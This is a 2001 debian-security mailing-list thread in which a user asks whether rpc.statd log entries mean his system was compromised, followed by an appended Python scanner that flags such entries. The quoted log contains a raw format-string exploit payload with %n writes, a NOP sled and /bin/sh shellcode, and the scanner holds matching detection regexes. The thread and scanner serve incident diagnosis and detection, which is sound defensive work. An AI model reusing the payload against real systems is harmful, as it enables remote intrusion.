You can check for modified binaries with tripwire.

If this was a decent hacker or even a script kiddie using a good tool, they
probably would have purged your logs of all evidence.

So either:

a) They are second rate
or
b) They didn't get in

- k

----- Original Message -----
From: "Alvin Oga" <[EMAIL PROTECTED]>
To: "Lukas Eppler" <[EMAIL PROTECTED]>
Cc: <debian-security@lists.debian.org>
Sent: Wednesday, July 11, 2001 5:45 PM
Subject: Re: was I cracked? (rpc.statd, new version)



hi ya lukas

how did you check for modified binaries ???

if it's an up to date deb box... it's a failed attempt...
if it's a redhat box... time to go digging...

you have to check the filesize of the binaries... not just the date...
compared to one that you know is NOT compromised...
and if you're really paranoid... run some tests on it..


have fun
alvin
http://www.Linux-Sec.net -- turn it off stuff ..


On Wed, 11 Jul 2001, Lukas Eppler wrote:

> I have the following entries in /var/log/messages:
>
> Jul  9 01:21:03 blue -- MARK --
> Jul  9 01:21:11 blue
> Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for
>
^X<F7><FF><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7>
<FF><BF>^[<F7><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%
n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\2
20\220\220\220\220\220\220\220\220\220\220\220
> Jul  9 01:21:11 blue
>
<C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>\200
<B0>^A<CD>\200<E8>\177<FF><FF><FF>
> Jul  9 01:41:03 blue -- MARK --
>
> I run Debian 2.2, nfs-common is Version: 1:0.1.9.1-1 which has the long
> known exploit fixed. I can't find modified binaries or any strange behaviour...
> was this a defeated attack? The second line says /bin/sh somewhere which makes
> me a bit concerned... Was I cracked?
>
> Lukas
>
>
>
> --
> Tempobrain AG - Dufourstrasse 179 - 8008 Zürich
> http://www.tempobrain.com | icq # 5856 2285
> +44 20 7233 6206 | +44 79 8037 7312
> +41  1 389 29 29 | +41 76 373 07 87
>


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact
[EMAIL PROTECTED]
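As an added example (not code from the list or from any of the posters), here is a small Python scanner for the kind of syslog entries Lukas quoted: it flags lines carrying printf-style conversions where a hostname should be, a long run of the octal escape \220 (byte 0x90 as syslog renders it), or a /bin/sh string, and leaves ordinary gethostbyname errors alone. The sample lines are constructed in the shape of the thread's entries and shortened; the regexes and thresholds are my own choices, not anything the posters used.

```python
import re

# Constructed sample syslog lines shaped like the entries quoted in the thread:
# a MARK line, the rpc.statd gethostbyname error carrying a format-string
# payload (shortened), an ordinary benign gethostbyname error, and a MARK.
SAMPLE_LOG = [
    "Jul  9 01:21:03 blue -- MARK --",
    "Jul  9 01:21:11 blue /sbin/rpc.statd[166]: gethostbyname error for "
    "^X<F7><FF><BF>^X<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n"
    + "\\220" * 40 + "<C7>^F/bin<C7>F^D/shA0<C0>",
    "Jul  9 01:25:00 blue /sbin/rpc.statd[166]: gethostbyname error for nfs1.example.org",
    "Jul  9 01:41:03 blue -- MARK --",
]

# printf conversions a real hostname never contains; %n is what makes the
# pattern a format-string attack rather than a harmless oddity
WRITE_DIRECTIVE = re.compile(r"%\d*n")
READ_DIRECTIVE = re.compile(r"%\d*x")
# syslog writes byte 0x90 as the octal escape \220; eight or more in a row is a NOP sled
NOP_SLED = re.compile(r"(?:\\220){8,}")
# "/bin/sh" with a few escaped bytes allowed between the two path components
SHELL_STRING = re.compile(r"/bin\S{0,8}/sh")


def classify(line):
    """Return the indicator names found in one syslog line (empty list if clean)."""
    found = []
    if WRITE_DIRECTIVE.search(line) or len(READ_DIRECTIVE.findall(line)) >= 4:
        found.append("format-string")
    if NOP_SLED.search(line):
        found.append("nop-sled")
    if SHELL_STRING.search(line):
        found.append("shell-string")
    return found


def scan(lines):
    """Return [(line_number, indicators)] for every line carrying at least one indicator."""
    hits = []
    for number, line in enumerate(lines, start=1):
        indicators = classify(line)
        if indicators:
            hits.append((number, indicators))
    return hits


if __name__ == "__main__":
    for number, indicators in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(indicators)}")
```

A hit on all three indicators in one rpc.statd line is the attempt itself; whether it succeeded is what the binary checks discussed above (tripwire, or comparing size and checksum against a known-good copy) have to answer.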

